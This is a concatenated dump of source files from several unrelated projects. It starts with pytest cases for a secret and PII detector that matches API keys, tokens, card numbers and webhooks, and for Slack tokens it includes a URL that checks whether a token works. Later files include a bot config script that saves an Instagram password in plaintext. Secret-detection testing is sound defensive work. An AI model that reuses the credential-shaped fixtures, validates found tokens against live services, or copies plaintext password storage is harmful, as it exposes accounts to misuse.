assert "American Social Security Number" not in str(res)
def test_ssn7():
res = r.check(["666-21-2222"])
assert "American Social Security Number" not in str(res)
def test_ssn8():
res = r.check(["000-21-5544"])
assert "American Social Security Number" not in str(res)
def test_ssn9():
res = r.check(["122-00-5544"])
assert "American Social Security Number" not in str(res)
def test_ssn10():
res = r.check(["122-32-0000"])
assert "American Social Security Number" not in str(res)
def test_cors():
res = r.check(["Access-Control-Allow: *"])
_assert_match_first_item("Access-Control-Allow-Header", res)
def test_jwt():
res = r.check(
[
"<KEY>"
]
)
_assert_match_first_item("JSON Web Token (JWT)", res)
def test_s3():
res = r.check(["http://s3.amazonaws.com/bucket/"])
_assert_match_first_item("Amazon Web Services Simple Storage (AWS S3) URL", res)
def test_s3_internal():
res = r.check(["s3://bucket/path/key"])
_assert_match_first_item(
"Amazon Web Services Simple Storage (AWS S3) Internal URL", res
)
def test_s3_internal2():
res = r.check(["s3://bucket/path/directory/"])
_assert_match_first_item(
"Amazon Web Services Simple Storage (AWS S3) Internal URL", res
)
def test_arn():
res = r.check(["arn:partition:service:region:account-id:resource"])
_assert_match_first_item("Amazon Resource Name (ARN)", res)
def test_arn2():
res = r.check(["arn:partition:service:region:account-id:resourcetype/resource"])
_assert_match_first_item("Amazon Resource Name (ARN)", res)
def test_arn3():
res = r.check(["arn:partition:service:region:account-id:resourcetype:resource"])
_assert_match_first_item("Amazon Resource Name (ARN)", res)
def test_arn4():
res = r.check(["arn:aws:s3:::my_corporate_bucket/Development/*"])
_assert_match_first_item("Amazon Resource Name (ARN)", res)
def test_unix_timestamp():
res = r.check(["1577836800"]) # 2020-01-01
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Timestamp" in keys
assert "Recent Unix Timestamp" in keys
def test_unix_timestamp2():
res = r.check(["94694400"]) # 1973-01-01
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Timestamp" in keys
assert "Recent Unix Timestamp" not in keys
def test_unix_timestamp3():
res = r.check(["1234567"]) # 7 numbers
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Timestamp" not in keys
assert "Recent Unix Timestamp" not in keys
def test_unix_timestamp4():
res = r.check(["1577836800000"]) # 2020-01-01
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Millisecond Timestamp" in keys
assert "Recent Unix Millisecond Timestamp" in keys
def test_unix_timestamp5():
res = r.check(["94694400000"]) # 1973-01-01
keys = [m["Regex Pattern"]["Name"] for m in res]
assert "Unix Millisecond Timestamp" in keys
assert "Recent Unix Millisecond Timestamp" not in keys
def test_ssh_rsa_key():
res = r.check(
[
"ssh-rsa A<KEY>x+5O9o0CtspkNmj/<KEY>cF4SUr20zHFoBoDQUtmvmBnWnKoGfpWXzuda449FVtmcrEjvBzCvCb3RStu0BbyOOybJagbKif3MkcYVO10pRbTveIUwgCD6F3ypD11XztoPNsgScmjme0sj/KWWNLyQkLWtpJEQ4k46745NAC5g+nP28TR2JM8doeqsxA8JovQkLWwDcR+WYZu2z/I8dfhOmalnoMRTJ2NzWDc0OSkKGYWjexR4fN6lAKCUOUptl9Nw== r00t@my-random_host"
]
)
_assert_match_first_item("SSH RSA Public Key", res)
def test_ssh_ecdsa_key():
res = r.check(
[
"ecdsa-sha2-nistp256 A<KEY>= r00t@my-random_host"
]
)
_assert_match_first_item("SSH ECDSA Public Key", res)
def test_ssh_ed25519_key():
res = r.check(
[
"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK0wmN/Cr3JXqmLW7u+g9pTh+wyqDHpSQEIQczXkVx9q r00t@my-random_host"
]
)
_assert_match_first_item("SSH ED25519 Public Key", res)
def test_aws_access_key():
res = r.check(["AKIAIOSFODNN7EXAMPLE"])
assert "Amazon Web Services Access Key" in str(res)
def test_aws_secret_access_key():
res = r.check(["<KEY>"])
assert "Amazon Web Services Secret Access Key" in str(res)
def test_aws_ec2_id():
res = r.check(["i-1234567890abcdef0"])
assert "Amazon Web Services EC2 Instance identifier" in str(res)
def test_aws_org_id():
res = r.check(["o-aa111bb222"])
assert "Amazon Web Services Organization identifier" in str(res)
def test_asin():
res = r.check(["B07ND5BB8V"])
_assert_match_first_item("Amazon Standard Identification Number (ASIN)", res)
def test_google_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("Google API Key", res)
def test_google_recaptcha_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("Google ReCaptcha API Key", res)
def test_google_oauth_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Google OAuth Token", res)
def test_aws_access_key_id():
res = r.check(["<KEY>"])
_assert_match_first_item("Amazon Web Services Access Key", res)
def test_mailgun_api_key():
res = r.check(["key-1e1631a9414aff7c262721e7b6ff6e43"])
_assert_match_first_item("Mailgun API Key", res)
def test_twilio_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("Twilio API Key", res)
def test_twilio_account_sid():
res = r.check(["AC10a133ffdfb112abb2d3f42d1d2d3b14"])
_assert_match_first_item("Twilio Account SID", res)
def test_twilio_application_sid():
res = r.check(["APfff01abd2b134a2aff3adc243ab211ab"])
_assert_match_first_item("Twilio Application SID", res)
def test_square_application_secret():
res = r.check(["<KEY>"])
_assert_match_first_item("Square Application Secret", res)
def test_square_access_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Square Access Token", res)
def test_stripe_api_key():
res = r.check(["sk_live_vHDDrL02ioRF5vYtyqiYBKma"])
_assert_match_first_item("Stripe API Key", res)
def test_github_access_token():
res = r.check(["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:<EMAIL>"])
_assert_match_first_item("GitHub Access Token", res)
def test_slack_api_key():
res = r.check(
["xoxp-<KEY>"]
)
_assert_match_first_item("Slack API Key", res)
_assert_match_exploit_first_item(
"https://slack.com/api/auth.test?token=<KEY>",
res,
)
def test_slack_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Slack Token", res)
_assert_match_exploit_first_item(
"https://slack.com/api/auth.test?token=<KEY>",
res,
)
def test_pgp_public_key():
res = r.check(
[
"-----BEGIN PGP PUBLIC KEY BLOCK-----Comment: Alice's OpenPGP certificateComment: https://www.ietf.org/id/draft-bre-openpgp-samples-01.htmlmDMEXEcE6RYJKwYBBAHaRw8BAQdArjWwk3FAqyiFbFBKT4TzXcVBqPTB3gmzlC/Ub7O1u120JkFsaWNlIExvdmVsYWNlIDxhbGljZUBvcGVucGdwLmV4YW1wbGU+iJAEExYIADgCGwMFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AWIQTrhbtfozp14V6UTmPyMVUMT0fjjgUCXaWfOgAKCRDyMVUMT0fjjukrAPoDnHBSogOmsHOsd9qGsiZpgRnOdypvbm+QtXZqth9rvwD9HcDC0tC+PHAsO7OTh1S1TC9RiJsvawAfCPaQZoed8gK4OARcRwTpEgorBgEEAZdVAQUBAQdAQv8GIa2rSTzgqbXCpDDYMiKRVitCsy203x3sE9+eviIDAQgHiHgEGBYIACAWIQTrhbtfozp14V6UTmPyMVUMT0fjjgUCXEcE6QIbDAAKCRDyMVUMT0fjjlnQAQDFHUs6TIcxrNTtEZFjUFm1M0PJ1Dng/cDW4xN80fsn0QEA22Kr7VkCjeAEC08VSTeV+QFsmz55/lntWkwYWhmvOgE==iIGO-----END PGP PUBLIC KEY BLOCK-----"
]
)
_assert_match_first_item("PGP Public Key", res)
def test_pgp_private_key():
res = r.check(
[
"-----BEGIN PGP PRIVATE KEY BLOCK-----Comment: Alice's OpenPGP Transferable Secret KeyComment: https://www.ietf.org/id/draft-bre-openpgp-samples-01.<KEY>9H444FAl2lnzoACgkQ8jFVDE9H447pKwD6A5xwUqIDprBzrHfahrImaYEZzncqb25vkLV2arYfa78A/R3AwtLQvjxwLDuzk4dUtUwvUYibL2sAHwj2kGaHnfICnF0EXEcE6RIKKwYBBAGXVQEFAQEHQEL/BiGtq0k84Km1wqQw2DIikVYrQrMttN8d7BPfnr4iAwEIBwAA/3/xFPG6U17rhTuq+07gmEvaFYKfxRB6sgAYiW6TMTpQEK6IeAQYFggAIBYhBOuFu1+jOnXhXpROY/IxVQxPR+OOBQJcRwTpAhsMAAoJEPIxVQxPR+OOWdABAMUdSzpMhzGs1O0RkWNQWbUzQ8nUOeD9wNbjE3zR+yfRAQDbYqvtWQKN4AQLTxVJN5X5AWybPnn+We1aTBhaGa86AQ===n8OM-----END PGP PRIVATE KEY BLOCK-----"
]
)
_assert_match_first_item("PGP Private Key", res)
def test_discord_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Discord Bot Token", res)
def test_discord_token_2():
res = r.check(["<KEY>"])
_assert_match_first_item("Discord Bot Token", res)
def test_discord_token_3():
res = r.check(["<KEY>"])
_assert_match_first_item("Discord Bot Token", res)
def test_bcglobal():
res = r.check(["6556123456789012"])
_assert_match_first_item("BCGlobal Card Number", res)
def test_carte_blanche():
res = r.check(["30137891521480"])
_assert_match_first_item("Carte Blanche Card Number", res)
def test_instapayment():
res = r.check(["6387849878080951"])
_assert_match_first_item("Insta Payment Card Number", res)
def test_stackhawk_api_key():
res = r.check(["hawk.wz6bAoFDwcVQFCD9dofE.w2R1PWI8UTvEM4jd56XQ"])
_assert_match_first_item("StackHawk API Key", res)
def test_jcb_card():
res = r.check(["3537124887293334"])
_assert_match_first_item("JCB Card Number", res)
res = r.check(["3543824683332150682"])
_assert_match_first_item("JCB Card Number", res)
def test_switch_card():
res = r.check(["633341812811453789"])
_assert_match_first_item("Switch Card Number", res)
def test_korean_card():
res = r.check(["9837282929900015"])
_assert_match_first_item("Korean Local Card Number", res)
def test_laser_card():
res = r.check(["630495060000000000"])
_assert_match_first_item("Laser Card Number", res)
def test_solo_card():
res = r.check(["6334498823141663"])
_assert_match_first_item("Solo Card Number", res)
def test_github_personal_access_token():
res = r.check(["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"])
_assert_match_first_item("GitHub Personal Access Token", res)
def test_discord_webhook():
res = r.check(
[
"https://discord.com/api/webhooks/894893734582452235/KhNc2-_zwY9FfCAK0iGUa_KfYyW8m5Ja_5i-V24fEY6ETwvLLn-GmdT_vq0Do9-YRsij"
]
)
_assert_match_first_item("Discord Webhook", res)
def test_github_oauth_token():
res = r.check(["gho_<PASSWORD>"])
_assert_match_first_item("GitHub OAuth Access Token", res)
def test_github_refresh_token():
res = r.check(
[
"ghr_1B4a2e77838347a7E420ce178F2E7c6912E169246c34E1ccbF66C46812d16D5B1A9Dc86A1498"
]
)
_assert_match_first_item("GitHub Refresh Token", res)
def test_stripe_api_key_2():
res = r.check(["<KEY>"])
_assert_match_first_item("Stripe API Key", res)
def test_zapier_webhook():
res = r.check(["https://hooks.zapier.com/hooks/catch/1234567/f8f22dgg/"])
_assert_match_first_item("Zapier Webhook Token", res)
def test_new_relic_rest_api_key():
res = r.check(["NRRA-2a2d50d7d9449f3bb7ef65ac1184c488bd4fe7a8bd"])
_assert_match_first_item("New Relic REST API Key", res)
def test_new_relic_synthetics_api_key():
res = r.check(["NRSP-us010E1E3D1716F721FF39F726B3E4CBCB7"])
_assert_match_first_item("New Relic Synthetics Location Key", res)
def test_new_relic_user_api_key():
res = r.check(["<KEY>"])
_assert_match_first_item("New Relic User API Key", res)
def test_nano():
res = r.check(["nano_1c46rz7xnk98ozhzdjq7thwty844sgnqxk9496yysit1bnio1rcdzshc5ymn"])
_assert_match_first_item("Nano (NANO) Wallet Address", res)
def test_pypi_upload_token():
res = r.check(
[
"<KEY>"
]
)
_assert_match_first_item("PyPi Upload Token", res)
def test_turkish_car_plate():
res = r.check(["34A2344"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_turkish_car_plate2():
res = r.check(["34A23415"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_turkish_car_plate3():
res = r.check(["06BK123"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_turkish_car_plate4():
res = r.check(["06JK1234"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_turkish_car_plate5():
res = r.check(["81ABC75"])
_assert_match_first_item("Turkish License Plate Number", res)
def test_date_of_birth():
res = r.check(["13.08.1987"])
_assert_match_first_item("Date of Birth", res)
def test_date_of_birth2():
res = r.check(["13081987"])
_assert_match_first_item("Date of Birth", res)
def test_date_of_birth3():
res = r.check(["13/08/1987"])
_assert_match_first_item("Date of Birth", res)
def test_date_of_birth4():
res = r.check(["13-08-1987"])
_assert_match_first_item("Date of Birth", res)
def test_date_of_birth5():
res = r.check(["13 08 1987"])
_assert_match_first_item("Date of Birth", res)
def test_turkish_id_number():
res = r.check(["12345678902"])
assert "Turkish Identification Number" in str(res)
def test_turkish_id_number2():
res = r.check(["12345678900"])
assert "Turkish Identification Number" in str(res)
def test_turkish_tax_number():
res = r.check(["1234567890"])
assert "Turkish Tax Number" in str(res)
``` |
{
"source": "0xmre/tuxart",
"score": 3
} |
#### File: tuxart/sources/colorengine.py
```python
import struct
import configparser
# Construction of the RGB triplet
# based on the triplet (y,m,n)
def hexformat(configmenu):
red = configparser.countconfig('y',configmenu)%255
green = configparser.countconfig('m',configmenu)%255
blue = configparser.countconfig('n',configmenu)%255
res = '%02x%02x%02x' % (red,green,blue)
return res
# Apply an offset-based modification to the hex color
def modifycolor(rgbstr, offset):
    # Reconstruction of the RGB triplet
    rgbtriplet = struct.unpack('BBB', bytes.fromhex(rgbstr))
    red = rgbtriplet[0]
    green = rgbtriplet[1]
    blue = rgbtriplet[2]
    # Modify red, green or blue depending on which value is the biggest
    if red > green and red > blue:
        if red < 150: red = red + 100
        if (green + offset) < 201: green = (green + offset) % 200
        if (blue + offset) < 231: blue = (blue + offset) % 230
    elif green > blue:
        if green < 201: green = green + 55
        if (blue + offset) < 231: blue = (blue + offset) % 230
        if (red + offset) < 151: red = (red + offset) % 150
    else:
        if blue < 150: blue = (blue + 150) % 255
        if (green + offset) < 201: green = (green + offset) % 200
        if (red + offset) < 201: red = (red + offset) % 200
    res = '%02x%02x%02x' % (abs(red), abs(green), abs(blue))
    return res
# Reduce the shadow of the hex color
def reflectioncolor(rgbstr):
    # Reconstruction of the RGB triplet
rgbtriplet = struct.unpack('BBB',bytes.fromhex(rgbstr))
red = rgbtriplet[0]
green = rgbtriplet[1]
blue = rgbtriplet[2]
if red>green and red>blue:
green= green + (red-green)*1/2
blue= blue + (red-blue)*1/2
elif green>blue:
blue=blue + (green-blue)*1/2
red= red + (green-red)*1/2
else:
red= red + (blue-red)*1/2
green= green + (blue-green)*1/2
res = '%02x%02x%02x' % (int(red),int(green),int(blue))
return res
# Increase the shadow of the hex color
def shadowcolor(rgbstr):
    # Reconstruction of the RGB triplet
rgbtriplet = struct.unpack('BBB',bytes.fromhex(rgbstr))
red = rgbtriplet[0]
green = rgbtriplet[1]
blue = rgbtriplet[2]
if red>green and red>blue:
green= green - (red-green)*1/4
blue= blue - (red-blue)*1/4
elif green>blue:
blue= blue - (green-blue)*1/4
red= red - (green-red)*1/4
else:
red= red - (blue-red)*1/4
green= green - (blue-green)*1/4
res = '%02x%02x%02x' % (abs(int(red)),abs(int(green)),abs(int(blue)))
return res
```
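The three color helpers above each take and return a six-character hex string. A small illustrative run (the input triplet is arbitrary), assuming the module above is importable as `colorengine`:
```python
from colorengine import modifycolor, reflectioncolor, shadowcolor

base = "c86432"  # an arbitrary reddish RGB triplet (200, 100, 50)
print(modifycolor(base, 20))  # shift the non-dominant channels by an offset
print(reflectioncolor(base))  # pull the other channels towards the dominant one (lighter)
print(shadowcolor(base))      # push the other channels away from the dominant one (darker)
```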
#### File: tuxart/sources/main.py
```python
import string
import re
import collections
import tuxmodifier
import configparser
import sys
def main():
    # If you choose to put your own .config file, pass its path as the first argument
    if len(sys.argv) > 1:
        filename = sys.argv[1]
    else:
        sys.exit("Usage: main.py <path to a kernel .config file>")
# Initialize tux_mod.svg
tuxmodifier.tuxinit()
    # Fill dictionary with the configuration file's values
# key: name of the menuconfig, value: configuration with value(y,m,n)
configparser.filldic(filename)
# Painting time!
tuxmodifier.tuxcolorizer()
# Adding accessories
tuxmodifier.accessoryhandler()
if __name__=="__main__":
main()
```
#### File: tuxart/sources/tuxmodifier.py
```python
from xml.dom.minidom import parse
import xml.dom.minidom
import re
import xml.sax
import xml.dom
import colorengine
import configparser
import os
# Path to local files
path = os.path.dirname(os.path.realpath(__file__))
home = os.path.expanduser("~")
pathtomod = os.path.join(home,"Pictures/tux_mod.svg")
#
# Declaration of the different body parts of the tux
#
bodypart = ['head','beak','left_eye','right_eye','body','torso','left_palm','right_palm']
# These arrays are filled with the different parts of the tux to modify
head = ['skin_between_eyes', 'head_skin', 'forehead_reflection', 'right_eyebrows', 'left_eyebrows', ]
beak = ['smile', 'beak_shadow_on_eyes', 'beak_bottom_part', 'beak_bottom_part_reflection', 'beak_upper_part', 'beak_upper_part_reflection', 'right_nostril', 'left_nostril', 'beak_right_end']
left_eye = ['white_left_eye', 'left_pupil', 'left_pupil_reflection', 'left_eyelid']
right_eye = ['white_right_eye', 'right_pupil', 'right_pupil_reflection_1', 'right_pupil_reflection_2', 'right_eyelid']
body = ['skin', 'right_leg', 'left_leg', 'right_arm', 'right_arm_reflection', 'neck_reflection', 'skin_reflection', 'right_hand', 'right_hand_reflection_1', 'right_hand_reflection_2', 'left_arm', 'left_arm_reflection']
torso = ['belly', 'torso_shadow', 'shadow_under_beak', 'chest_left_shadow', 'chest_right_shadow', 'chest_middle_shadow', 'belly_shadow']
left_palm = ['left_palm', 'left_palm_shadow_1', 'left_palm_shadow_2', 'left_palm_reflection']
right_palm = ['right_palm_shadow_1', 'right_palm_shadow_2', 'right_palm_shadow_3', 'right_palm', 'right_palm_reflection', 'right_arm_shadow_1', 'right_arm_shadow_2']
# Accessory adder
def accessoryhandler():
# index in both lists links an item with a configuration
configs = ["CONFIG_FTRACE","CONFIG_CPU_FREQ_DEFAULT_GOV_USERSPACE","CONFIG_CPU_FREQ_DEFAULT_GOV_PERFORMANCE","CONFIG_CPU_FREQ_DEFAULT_GOV_CONSERVATIVE","CONFIG_ENCRYPTED_KEYS","CONFIG_USB_USBNET"]
items = ["tattoo1","helmet1","helmet2","helmet3","shield","cape"]
for config, item in zip(configs,items):
if configparser.isconfigenabled(config):
addaccessory(item)
# Color every part of the tux
def tuxcolorizer():
for key in bodypart:
if "left_eye" in key:
color1 = colorengine.hexformat('system')
color2 = colorengine.modifycolor(color1,-30)
color3 = colorengine.modifycolor(color1,10)
reflection = colorengine.reflectioncolor(color1)
for zone in left_eye:
if 'left_pupil' in zone:
modify(color2, zone)
elif 'reflection' in zone:
modify(reflection,zone)
elif 'white' in zone:
modify(reflection, zone)
else:
modify(color1, zone)
elif "right_eye" in key:
color1 = colorengine.hexformat('system')
color2 = colorengine.modifycolor(color1,-30)
color3 = colorengine.modifycolor(color1,10)
reflection = colorengine.reflectioncolor(color1)
for zone in right_eye:
if 'right_pupil' in zone:
modify(color2, zone)
elif 'reflection' in zone:
modify(reflection,zone)
elif 'white' in zone:
modify(reflection, zone)
else:
modify(color1, zone)
elif "beak" in key:
color1 = colorengine.hexformat('river')
color2 = colorengine.modifycolor(color1,-40)
reflection = colorengine.reflectioncolor(color1)
shadow = colorengine.shadowcolor(color1)
for zone in beak:
if 'nostril' in zone:
modify(color1,zone)
elif 'smile' in zone:
modify(colorengine.hexformat('Kernel'), zone)
elif 'shadow' in zone:
modify(shadow, zone)
else:
modify(color2, zone)
elif "head" in key:
color1 = colorengine.hexformat('sensors')
color2 = colorengine.modifycolor(color1,25)
color3 = colorengine.shadowcolor(color2)
reflection = colorengine.reflectioncolor(color2)
for zone in head:
if 'reflection' in zone:
modify(reflection, zone)
elif 'eyebrows' in zone:
modify(color1, zone)
elif 'eyes' in zone:
modify(color3, zone)
else:
modify(color2, zone)
elif "body" in key:
color1 = colorengine.hexformat('CPU')
color2 = colorengine.modifycolor(color1,20)
color3 = colorengine.modifycolor(color1,-10)
shadow = colorengine.shadowcolor(color1)
reflection = colorengine.reflectioncolor(color1)
for zone in body:
if 'reflection' in zone:
modify(reflection, zone)
if 'leg' in zone:
modify(color2, zone)
elif 'skin' in zone:
modify(color3, zone)
else:
modify(color1, zone)
elif "torso" in key:
color1 = colorengine.hexformat('Net')
color2 = colorengine.modifycolor(color1,40)
shadow = colorengine.shadowcolor(color1)
for zone in torso:
if 'shadow' in zone:
modify(shadow, zone)
elif 'belly' in zone:
modify(color2, zone)
else:
modify(color1, zone)
elif "left_palm" in key:
color1 = colorengine.hexformat('USB')
color2 = colorengine.modifycolor(color1,-50)
reflection = colorengine.reflectioncolor(color1)
shadow = colorengine.shadowcolor(color1)
for zone in left_palm:
if 'reflection' in zone:
modify(reflection, zone)
elif 'shadow_1' in zone:
modify(shadow, zone)
elif 'shadow_2' in zone:
modify(color2, zone)
else:
modify(color1, zone)
elif "right_palm" in key:
color1 = colorengine.hexformat('support')
color2 = colorengine.modifycolor(color1,20)
reflection = colorengine.reflectioncolor(color1)
shadow = colorengine.shadowcolor(color1)
for zone in right_palm:
if 'reflection' in zone:
modify(reflection, zone)
elif 'shadow_1' in zone:
modify(shadow, zone)
elif 'shadow' in zone:
modify(reflection, zone)
else:
modify(color1, zone)
# Add argument item to tux_mod.svg
def addaccessory(item):
"""
    takes the name of an item and adds it to the specified file
"""
global pathtomod
global path
DOMTree = parse(pathtomod)
f=open(pathtomod, "w")
svg = DOMTree.documentElement
newElement = DOMTree.createElement("g")
newElement.setAttribute("id","mark")
svg.appendChild(newElement);
f.write(DOMTree.toprettyxml())
f.close()
f=open(pathtomod, "r")
regex="<g id=\"mark\"/>"
regex=re.escape(regex)
matches=re.split(regex, f.read(), 1)
tuxSvg1=matches[0]
tuxSvg2=matches[1]
f.close()
pathtoitem = os.path.join(path, "sprays/")
f=open(pathtoitem+item+".svg", "r")
regex="id=\""+item+"\""
regex=re.escape(regex)
tuxSvg1=tuxSvg1+"<g\n\t\t\t"+regex
matches=re.split(regex, f.read(), 1)
match=matches[1]
regex="<g id=\"mark\"/>"
regex=re.escape(regex)
matches=re.split(regex, match, 1)
f.close()
f=open(pathtomod, "w")
f.write(tuxSvg1+matches[0]+tuxSvg2)
f.close()
# Apply color in hexadecimal to bodypart
def modify(hexacolor, bodypart):
"""
modify the bodypart with the color given
"""
global pathtomod
DOMTree = xml.dom.minidom.parse(pathtomod)
f=open(pathtomod, "w")
svg = DOMTree.documentElement
paths = svg.getElementsByTagName("path")
for path in paths:
if path.getAttribute("id")==bodypart:
if path.hasAttribute("style"):
style = path.getAttribute("style")
regex="fill:"
matches=re.split(regex, style, 1)
newStyle=matches[0]+"fill:"
regex=";"
style=matches[1]
matches=re.split(regex, style, 1)
newStyle=newStyle+"#"+hexacolor+";"+matches[1]
path.setAttribute("style", newStyle)
else:
print(bodypart+" : <style> not found")
f.write(DOMTree.toprettyxml())
f.close()
# Initialize tux_mod.svg
def tuxinit():
"""
go back to the original Tux
"""
global path
global pathtomod
pathtotux = os.path.join(path, "sprays/original_tux.svg")
tux = open(pathtotux).read()
f=open(pathtomod, "w+")
f.write(tux)
f.close()
``` |
{
"source": "0xN1nja/Instagram-DM-Bot",
"score": 3
} |
#### File: 0xN1nja/Instagram-DM-Bot/config.py
```python
import getpass
import re
import os
# Constants
WELCOME_MESSAGE = '''
###
# # # #### ##### ## #### ##### ## # #
# ## # # # # # # # # # # # ## ##
# # # # #### # # # # # # # # # ## #
# # # # # # ###### # ### ##### ###### # #
# # ## # # # # # # # # # # # # #
### # # #### # # # #### # # # # # #
##### # #
# # ## ##
# # # ## #
# # # #
# # # #
##### # #
##### #### #####
# # # # #
##### # # #
# # # # #
# # # # #
##### #### #
'''
print(WELCOME_MESSAGE)
def validate_schedule_input(scheduling_time: str):
if not re.match(r"\d\d:\d\d", scheduling_time):
return False
else:
return True
def validate_webhook_url(webhook_url: str):
if webhook_url.startswith("https://") or webhook_url.startswith("http://"):
return True
else:
return False
username = input("Enter Your Instagram Username : ").lower()
if len(username) > 0:
USERNAME = username
else:
print("Invalid Username!")
exit()
password = getpass.getpass("Enter Your Instagram Password : ")
if len(password) > 0:
PASSWORD = password
else:
print("Invalid Password!")
exit()
t_username = input("Enter Target's Username : ").lower()
if len(t_username) > 0:
TARGET_USERNAME = t_username
else:
print("Enter Target's Username Correctly!")
exit()
schedule_message = input("Do You Want To Schedule Message (Y/N) : ").lower()
if schedule_message == "y":
s_time = input("Enter Sending Time (24hr) Eg : 00:00 : ")
if validate_schedule_input(s_time):
SENDING_TIME = s_time
SCHEDULE_MESSAGE = True
DONT_SCHEDULE = False
else:
print("Invalid Time Format.")
exit()
elif schedule_message == "n":
SENDING_TIME = None
DONT_SCHEDULE = True
SCHEDULE_MESSAGE = False
else:
print("Please Enter Value Correctly!")
exit()
shutdown_pc = input("Do You Want To Shutdown PC After Sending Message (Y/N) : ").lower()
if shutdown_pc == "y":
SHUTDOWN = True
elif shutdown_pc == "n":
SHUTDOWN = False
else:
print("Please Enter Value Correctly!")
exit()
chromedriver_path = input(
"Enter Chrome Driver Path (Download From https://chromedriver.chromium.org/ According To Your Chrome Version) : ")
if "chromedriver" in chromedriver_path and os.path.isfile(chromedriver_path):
CHROME_DRIVER_PATH = chromedriver_path
else:
print("Invalid Chrome Driver Path!")
exit()
message = input("Type Message To Send : ")
if len(message) > 0:
MESSAGE = message
else:
print("Please Enter Message Correctly!")
exit()
webhook_url = input("Enter Discord Webhook URL : ")
if len(webhook_url) > 0 and validate_webhook_url(webhook_url):
WEBHOOK_URL = webhook_url
else:
print("Invalid Webhook URL!")
exit()
with open("config.txt", "w") as f:
f.write(str(USERNAME) + "\n")
f.write(str(PASSWORD) + "\n")
f.write(str(TARGET_USERNAME) + "\n")
f.write(str(MESSAGE) + "\n")
f.write(str(SHUTDOWN) + "\n")
f.write(str(SENDING_TIME) + "\n")
f.write(str(CHROME_DRIVER_PATH) + "\n")
f.write(str(DONT_SCHEDULE) + "\n")
f.write(str(SCHEDULE_MESSAGE) + "\n")
f.write(str(WEBHOOK_URL) + "\n")
print("Done! Now Run bot.py")
``` |
{
"source": "0xNev/Gas-Notifier",
"score": 3
} |
#### File: 0xNev/Gas-Notifier/main.py
```python
import requests,time
from discord_webhook import DiscordWebhook, DiscordEmbed
print('Monitoring has started...')
targetprice = 40
EtherscanApiKey = ''
webhookurl = ''
def ping(gas):
webhook = DiscordWebhook(url=webhookurl)
embed = DiscordEmbed(title=':fuelpump: GAS LOW :fuelpump:', description=f'Gas price currently at {gas} ', color='03b2f8')
webhook.add_embed(embed)
response = webhook.execute()
print('Webhook Sent')
def getgas():
global gas
r = requests.get(f'https://api.etherscan.io/api?module=gastracker&action=gasoracle&apikey={EtherscanApiKey}')
gas = r.json()['result']['ProposeGasPrice']
print(f'Monitoring[{gas}]')
time.sleep(.9)
if __name__ == "__main__":
while True:
getgas()
gas_ = int(gas)
if gas_ <= targetprice:
print(f'Gas is at or below desired price [{str(targetprice)}]')
ping(gas_)
time.sleep(10)
else:
pass
``` |
{
"source": "0xNone/slim",
"score": 3
} |
#### File: slim/base/sqlfuncs.py
```python
import logging
from abc import abstractmethod
from enum import Enum
from typing import Tuple, Dict, Iterable, Union, List
from .sqlquery import SQLQueryInfo, SQLValuesToWrite, DataRecord
logger = logging.getLogger(__name__)
class AbstractSQLFunctions:
def __init__(self, view_cls):
self.vcls = view_cls
@abstractmethod
async def select_one(self, info: SQLQueryInfo) -> DataRecord:
"""
Select one record from database
:param info:
:return: record
"""
raise NotImplementedError()
@abstractmethod
async def select_page(self, info: SQLQueryInfo, size=1, page=1) -> Tuple[Tuple[DataRecord, ...], int]:
"""
Select from database
:param info:
:param size: -1 means infinite
:param page:
        :return: records, count
"""
raise NotImplementedError()
@abstractmethod
async def update(self, records: Iterable[DataRecord], values: SQLValuesToWrite, returning=False) -> Union[int, Iterable[DataRecord]]:
"""
:param records:
:param values:
:param returning:
:return: return count if returning is False, otherwise records
"""
raise NotImplementedError()
@abstractmethod
async def insert(self, values_lst: Iterable[SQLValuesToWrite], returning=False) -> Union[int, List[DataRecord]]:
"""
:param values_lst:
:param returning:
:return: return count if returning is False, otherwise records
"""
raise NotImplementedError()
@abstractmethod
async def delete(self, records: Iterable[DataRecord]) -> int:
raise NotImplementedError()
```
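A toy in-memory subclass can make the contract above concrete. This is only an illustrative sketch: it ignores the actual `SQLQueryInfo` conditions, treats records as plain dicts, and assumes the `slim` package is importable:
```python
from slim.base.sqlfuncs import AbstractSQLFunctions

class MemorySQLFunctions(AbstractSQLFunctions):
    """Toy backend: a list of dicts instead of a real database."""
    def __init__(self, view_cls, rows=None):
        super().__init__(view_cls)
        self.rows = list(rows or [])

    async def select_one(self, info):
        # Assumes at least one row; a real backend would raise RecordNotFound.
        return self.rows[0]

    async def select_page(self, info, size=1, page=1):
        chunk = self.rows if size == -1 else self.rows[(page - 1) * size: page * size]
        return tuple(chunk), len(self.rows)

    async def update(self, records, values, returning=False):
        records = list(records)
        for r in records:
            r.update(values)
        return records if returning else len(records)

    async def insert(self, values_lst, returning=False):
        new = [dict(v) for v in values_lst]
        self.rows.extend(new)
        return new if returning else len(new)

    async def delete(self, records):
        count = 0
        for r in list(records):
            self.rows.remove(r)
            count += 1
        return count
```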
#### File: slim/base/view.py
```python
import asyncio
import logging
import time
from abc import abstractmethod
from ipaddress import ip_address, IPv4Address, IPv6Address
from types import FunctionType
from typing import Tuple, Union, Dict, Iterable, Type, List, Set, Any, Optional
from unittest import mock
from aiohttp import web, hdrs
from aiohttp.web_request import BaseRequest
from multidict import CIMultiDictProxy
from slim.base.user import BaseUserViewMixin
from .sqlquery import SQLQueryInfo, SQL_TYPE, SQLForeignKey, SQLValuesToWrite, ALL_COLUMNS, PRIMARY_KEY, SQL_OP
from .app import Application
from .helper import create_signed_value, decode_signed_value
from .permission import Permissions, Ability, BaseUser, A, DataRecord
from .sqlfuncs import AbstractSQLFunctions
from ..retcode import RETCODE
